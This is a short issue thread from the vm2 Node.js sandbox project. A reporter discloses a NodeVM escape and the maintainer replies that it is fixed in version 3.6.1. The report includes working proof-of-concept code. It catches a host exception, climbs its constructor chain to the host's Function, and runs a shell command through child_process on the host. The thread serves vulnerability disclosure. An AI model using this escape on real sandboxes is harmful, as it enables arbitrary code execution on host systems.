VM Escape

[eugenekolo]

It's possible to escape the NodeVM through access to host objects, specifically through an exception. Some host objects are accessible from the VM's pseudo Nodejs events.

In fact, the next escape will always be there from somebody clever. Nodejs's vm module that this builds upon states:

The vm module is not a security mechanism. Do not use it to run untrusted code.

I don't believe something that builds upon it can claim to be secure to untrusted code as the README states.

const {NodeVM} = require('vm2'); 
nvm = new NodeVM()

nvm.run(`
    try {
        this.process.removeListener(); // or .on, .once, or anything that throws a host exception
    } 
    catch (host_exception) {
        console.log('host exception: ' + host_exception.toString());
        host_constructor = host_exception.constructor.constructor;
        host_process = host_constructor('return this')().process;
        console.log('host execution: ' + host_process.mainModule.require('child_process').execSync('id').toString());
    }

[patriksimek]

@eugenekolo Thank you for reporting the issue; it's fixed in 3.6.1.

The statement on Node's VM module is really important because Node's internal VM is not intended to run untrusted code. That's why I started this project - to make an additional layer that makes the context secure enough to run untrusted code.

And as with every software out there that claims to be secure - it is safe until someone finds the way how to break it.